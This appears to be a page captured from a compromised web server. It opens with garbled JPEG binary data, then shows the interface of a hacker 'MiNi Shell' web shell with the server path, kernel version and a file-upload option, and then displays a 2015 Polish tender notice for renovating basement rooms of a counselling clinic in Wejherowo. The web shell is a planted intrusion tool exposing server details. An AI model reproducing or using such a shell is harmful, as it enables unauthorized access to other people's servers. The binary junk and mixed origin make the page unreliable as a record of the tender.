JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150730/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150730/194240-N-2015.html

<p class="kh_header"><b>Wejherowo: Remont pomieszczeń piwnicznych w budynku Poradni Psychologiczno - Pedagogicznej w Wejherowie przy ul. Ofiar Piaśnicy 22</b><br>
<b>Numer ogłoszenia: 194240 - 2015; data zamieszczenia: 30.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zespół Poradni Psychologiczno-Pedagogicznych w Wejherowie , ul. Ofiar Piaśnicy 22, 84-200 Wejherowo, woj. pomorskie, tel. 58 672 10 08, faks 58 672 39 66.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja oświatowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pomieszczeń piwnicznych w budynku Poradni Psychologiczno - Pedagogicznej w Wejherowie przy ul. Ofiar Piaśnicy 22.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Pomieszczenie nr 012:
- podwyższenie i zwężenie istniejącego otworu drzwiowego z wykonaniem nowego nadproża z belek L19 w ścianie gr. 29 cm
- przygotowanie istniejącej posadzki lastrykowej (skucie i wyrównanie) pod płytki gresowe 
- zeskrobanie i zmycie farby ze ścian i sufitów - 55 m2
- uzupełnienie i naprawa istniejących tynków ścian - 8,5 m2
- cekolowanie sufitów - 15 m2
- cekolowanie ścian nad płytkami ceramicznymi - 13 m2
- okładziny ścian płytkami ceramicznymi o wym. min. 20x30 cm - 26,6 m2
- wywiezienie i utylizacja materiałów pochodzących z rozbiórki
- izolacja posadzki z folii w płynie z wywinięciem na ściany na wys. 15 cm - 17,4 m2
- posadzki z płytek gresowych antypoślizgowych - 15 m2
- malowanie sufitów farbami emulsyjnymi w kolorze białym - 15 m2
- malowanie ścian farbami emulsyjnymi w kolorach pastelowych - 13,3 m2
- dostawa i osadzenie: stalowe drzwi powietrzno-szczelne kompletne 80x200 cm z 2 klamkami (na górze i dole) - 1 kpl
- demontaż istniejącej instalacji wodno-kanalizacyjnej
- wykonanie instalacji wodociągowej z rur miedzianych z otuliną gr. 6 mm w bruzdach - 26 mb
- wykonanie instalacji kanalizacyjnej z rur PCV 50 mm - 7,5 m
- montaż kratki ściekowej podłogowej ze stali nierdzewnej - 1 szt
- montaż zlewozmywaka ze stali nierdzewnej na szafce wraz z baterią stojącą - 1 kpl,
- montaż umywalki porcelanowej z półpostumentem i baterią stojącą - 1 kpl,
- montaż wanny stalowej emaliowanej o wym. 70x170 cm w zabudowie z płytek ceramicznych - 1 kpl,
- demontaż istniejącej instalacji co wraz z grzejnikami
- grzejniki stalowe V22 600/900 z głowicą termostatyczną z zaworkami odcinającymi - 2 kpl,
- podłączenie grzejników rurami stalowymi w bruzdach do istniejącej instalacji co - 8 mb, 
- demontaż instalacji i osprzętu elektrycznego
- montaż oprawy oświetleniowej natynkowej hermetycznej z kloszem z elektronicznym układem zasilającym 2x36 W, malowana proszkowo - 2 szt, wraz z instalacją światła 3x1,5 mm2 z wykuciem i zaprawianiem bruzd 
- montaż gniazd wtyczkowych IP65, 16A, 230V - 4 szt z instalacją siły 3x2,5 mm2 z wykuciem i zaprawianiem bruzd 
- montaż łączników podtynkowych - 1 szt
- dostawa i montaż suchej ściany lakierniczej o wym. min. 250x135x80 cm z wentylatorem wyciągowym o wydajności min. 3500 m3/h
- pomiary instalacji

2. Pomieszczenie nr 012A:
- rozebranie ścianki działowej wraz z ościeżnicą - 1,50 m3
- przygotowanie istniejącej posadzki lastrykowej (skucie i wyrównanie) pod podłogę drewnianą
- zeskrobanie i zmycie farby ze ścian i sufitów - 69 m2
- wywiezienie i utylizacja materiałów pochodzących z rozbiórki
- uzupełnienie i naprawa istniejących tynków ścian - 10,7 m2
- cekolowanie sufitów - 29 m2
- cekolowanie ścian - 56 m2
- izolacja posadzki z folii polietylenowej gr. 0,3 mm - 29 m2
- podłoga z desek struganych gr. 32 mm łączonych na pióro i wpust, olejowanych na legarach drewnianych impregnowanych - 29 m2
- malowanie sufitów farbami emulsyjnymi w kolorze białym - 29 m2
- malowanie ścian farbami emulsyjnymi w kolorach pastelowych - 27 m2
- lamperie ftalowe matowe ze szpachlowaniem ścian szpachlówkami celulozowymi - 28,7 m2
- demontaż istniejącej instalacji co wraz z grzejnikami
- grzejniki stalowe V22 600/900 z głowicą termostatyczną z zaworkami odcinającymi - 4 kpl,
- podłączenie grzejników rurami stalowymi w bruzdach do istniejącej instalacji co - 16 mb, 
- demontaż instalacji i osprzętu elektrycznego
- montaż oprawy oświetleniowej natynkowej 120x30 cm z rastrem parabolicznym, odbłyśnikiem i poprzeczkami z elektronicznym układem zasilającym 2x36 W, malowana proszkowo - 4 szt, wraz z instalacją światła 3x1,5 mm2 z wykuciem i zaprawianiem bruzd 
- montaż gniazd wtyczkowych podwójnych IP20, 16A, 230V, L+N+PE z ramką- 6 szt z instalacją siły 3x2,5 mm2 z wykuciem i zaprawianiem bruzd 
- montaż łączników podtynkowych - 1 szt
- pomiary instalacji

3. Pomieszczenie nr 012B:
- rozebranie ścianki działowej wraz z ościeżnicą - 1,60 m3
- przygotowanie istniejącej posadzki lastrykowej (skucie i wyrównanie) pod podłogę drewnianą
- zeskrobanie i zmycie farby ze ścian i sufitów - 85,5 m2
- wywiezienie i utylizacja materiałów pochodzących z rozbiórki
- uzupełnienie i naprawa istniejących tynków ścian - 10,7 m2
- cekolowanie sufitów - 29 m2
- cekolowanie ścian - 56 m2
- izolacja posadzki z folii polietylenowej gr. 0,3 mm - 29 m2
- podłoga z desek struganych gr. 32 mm łączonych na pióro i wpust, olejowanych na legarach drewnianych impregnowanych - 29 m2
- malowanie sufitów farbami emulsyjnymi w kolorze białym - 29 m2
- malowanie ścian farbami emulsyjnymi w kolorach pastelowych - 27 m2
- lamperie ftalowe matowe ze szpachlowaniem ścian szpachlówkami celulozowymi - 31 m2
- demontaż istniejącej instalacji co wraz z grzejnikami
- grzejniki stalowe V22 600/900 z głowicą termostatyczną z zaworkami odcinającymi - 3 kpl,
- podłączenie grzejników rurami stalowymi w bruzdach do istniejącej instalacji co - 16 mb, 
- demontaż instalacji i osprzętu elektrycznego
- montaż oprawy oświetleniowej natynkowej 120x30 cm z rastrem parabolicznym, odbłyśnikiem i poprzeczkami z elektronicznym układem zasilającym 2x36 W, malowana proszkowo - 4 szt, wraz z instalacją światła 3x1,5 mm2 z wykuciem i zaprawianiem bruzd 
- montaż gniazd wtyczkowych podwójnych IP20, 16A, 230V, L+N+PE z ramką- 6 szt z instalacją siły 3x2,5 mm2 z wykuciem i zaprawianiem bruzd 
- montaż łączników podtynkowych - 1 szt
- pomiary instalacji

4. Pomieszczenie nr 012C:
- przygotowanie istniejącej posadzki lastrykowej i podłoża (skucie i wyrównanie) pod podłogę drewnianą
- zeskrobanie i zmycie farby ze ścian i sufitów - 79 m2
- wywiezienie i utylizacja materiałów pochodzących z rozbiórki
- cekolowanie sufitów - 21 m2
- cekolowanie ścian - 27 m2
- izolacja posadzki z folii polietylenowej gr. 0,3 mm - 21 m2
- podłoga z desek struganych gr. 32 mm łączonych na pióro i wpust, olejowanych na legarach drewnianych impregnowanych - 21 m2
- malowanie sufitów farbami emulsyjnymi w kolorze białym - 21 m2
- malowanie ścian farbami emulsyjnymi w kolorach pastelowych - 27 m2
- lamperie ftalowe matowe ze szpachlowaniem ścian szpachlówkami celulozowymi - 32 m2
- demontaż istniejącej instalacji co wraz z grzejnikami
- grzejniki stalowe V22 600/1500 z głowicą termostatyczną z zaworkami odcinającymi - 2 kpl,
- podłączenie grzejników rurami stalowymi w bruzdach do istniejącej instalacji co - 8 mb, 
- demontaż instalacji i osprzętu elektrycznego
- montaż oprawy oświetleniowej natynkowej 120x30 cm z rastrem parabolicznym, odbłyśnikiem i poprzeczkami z elektronicznym układem zasilającym 2x36 W, malowana proszkowo - 3 szt, wraz z instalacją światła 3x1,5 mm2 z wykuciem i zaprawianiem bruzd 
- montaż gniazd wtyczkowych podwójnych IP20, 16A, 230V, L+N+PE z ramką- 4 szt z instalacją siły 3x2,5 mm2 z wykuciem i zaprawianiem bruzd 
- montaż łączników podtynkowych - 1 szt
- pomiary instalacji

5. Korytarz:
- rozebranie posadzek lastrykowych - 4 m2
- podwyższenie i poszerzenie istniejącego otworu drzwiowego z wykonaniem nowego nadproża z belek L19 w ścianie gr. 44 cm
- uzupełnienie ścianek z cegły gr. 1/2 c. - 1,5 m2
- uzupełnienie posadzki lastrykowej po poszerzeniu otworu drzwiowego
- warstwa wyrównawcza pod posadzki - 4 m2
- posadzka z płytek gresowych antypoślizgowych wraz z cokolikiem - 4 m2
- zeskrobanie i zmycie farby ze ścian i sufitów - 13 m2
- wywiezienie i utylizacja materiałów pochodzących z rozbiórki
- uzupełnienie i naprawa istniejących tynków ścian - 4 m2
- cekolowanie sufitów - 4 m2
- cekolowanie ścian - 9 m2
- malowanie sufitów farbami emulsyjnymi w kolorze białym - 4 m2
- malowanie ścian farbami emulsyjnymi w kolorach pastelowych - 10 m2
- lamperie ftalowe matowe ze szpachlowaniem ścian szpachlówkami celulozowymi - 12 m2
- drzwi stalowe pełne 90 EI30, malowane proszkowo - 1 szt
- drzwi 90 w okleinie drewnopodobnej CPL HQ - kompletne z wkładką patentową - 1 kpl
- demontaż instalacji i osprzętu elektrycznego
- montaż oprawy oświetleniowej natynkowej 120x30 cm z rastrem parabolicznym, odbłyśnikiem i poprzeczkami z elektronicznym układem zasilającym 2x36 W, malowana proszkowo - 1 szt, wraz z instalacją światła 3x1,5 mm2 z wykuciem i zaprawianiem bruzd 
- montaż łączników podtynkowych - 1 szt
- pomiary instalacji

6. Pomieszczenie nr 012:
- wykonanie otworu drzwiowego w ścianie gr. 29 cm o wym. 90x205 cm wraz z wykonaniem nadproża z belek L19 - 1 kpl
- skucie posadzki z płytek ceramicznych wraz z warstwą wyrównawczą - 8 m2
- skucie płytek ceramicznych ze ścian wraz z warstwą zaprawy - 25,6 m2
- wywiezienie i utylizacja materiałów pochodzących z rozbiórki
- uzupełnienie ścianek gr. 1/2 c. 7 m2
- uzupełnienie ścianek gr. 1/4 c. 2 m2
- tynki cem. wap. kat II pod płytki ceramiczne - 33 m2
- zeskrobanie i zmycie farby ze ścian i sufitów - 22 m2
- cekolowanie sufitów - 8 m2
- cekolowanie ścian nad płytkami ceramicznymi - 14 m2
- okładziny ścian płytkami ceramicznymi o wym. min. 20x30 cm - 31 m2
- warstwy wyrównawcze pod posadzki gr. 4 cm- 8 m2
- izolacja posadzki i ścian z folii w płynie - 15 m2
- posadzki z płytek gresowych antypoślizgowych - 8 m2
- malowanie sufitów farbami emulsyjnymi w kolorze białym - 8 m2
- malowanie ścian farbami emulsyjnymi w kolorach pastelowych - 14 m2
- drzwi 80 łazienkowe w okleinie drewnopodobnej CPL HQ - kompletne z wkładką patentową - 1 kpl
- demontaż istniejącej instalacji wodno-kanalizacyjnej wraz z osprzętem
- wykonanie instalacji wodociągowej z rur miedzianych z otuliną gr. 6 mm w bruzdach - 36 mb
- wykonanie instalacji kanalizacyjnej z rur PCV 50 mm - 8,5 m
- montaż kratki ściekowej podłogowej ze stali nierdzewnej - 1 szt
- wykonanie instalacji kanalizacyjnej z rur PCV 110 mm - 3,5 m
- montaż umywalki porcelanowej z półpostumentem i baterią stojącą - 2 kpl,
- bateria prysznicowa podtynkowa odporna na wandalizm, z deszczownicami o regulowanym kierunku strumienia osadzonymi na stałe w płaszczyźnie ściany (bez węża).- 1 kpl,
- ustęp porcelanowy typu kompakt - 1 kpl
- montaż drzwi prysznicowych szklanych, dwuskrzydłowych (2x45 cm)
- demontaż istniejącej instalacji co wraz z grzejnikami
- grzejniki stalowe V22 600/600 z głowicą termostatyczną z zaworkami odcinającymi - 1 kpl,
- podłączenie grzejników rurami stalowymi w bruzdach do istniejącej instalacji co - 8 mb, 
- demontaż instalacji i osprzętu elektrycznego
- montaż oprawy oświetleniowej natynkowej bryzgoszczelnej - 3 szt, wraz z instalacją światła 3x1,5 mm2 z wykuciem i zaprawianiem bruzd 
- montaż łączników podtynkowych - 2 szt
- pomiary instalacji..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Roboty rozbiórkowe, Roboty murarskie i murowe, Tynkowanie, Roboty pokrywcze podłóg i ścian, Roboty malarski, Roboty w zakresie stolarki budowlanej, Roboty instalacyjne wodne i kanalizacyjne, Roboty instalacyjne centralnego ogrzewania, Roboty instalacyjne elektryczne.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.13.00-1, 45.26.25.00-6, 45.41.00.00-4, 45.43.00.00-0, 45.44.21.00-8, 45.42.10.00-4, 45.32.00.00-6, 45.33.11.00-7, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości 2 300 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonał w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył co najmniej 2 roboty ogólnobudowlane, w tym z zakresu instalacji sanitarnych oraz centralnego ogrzewania, na kwoty min. 70 000 zł</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje jedną osobą, która posiada uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej oraz jedną osobą, która posiada uprawnienia do kierowania robotami w zakresie instalacji urządzeń elektrycznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonał w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył co najmniej 2 roboty ogólnobudowlane, w tym z zakresu instalacji sanitarnych oraz centralnego ogrzewania, na kwoty min. 70 000 zł;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania zamówienia - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.poradnia-wejherowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zespół Poradni Psychologiczno - Pedagogicznych w Wejherowie, ul. Ofiar Piaśnicy 22, 84 - 200 Wejherowo pok. 102.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.08.2015 godzina 09:30, miejsce: Powiatowy Zespół Poradni Psychologiczno - Pedagogicznych w Wejherowie, ul. Ofiar Piaśnicy 22, 84 - 200 Wejherowo, pok. 109.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com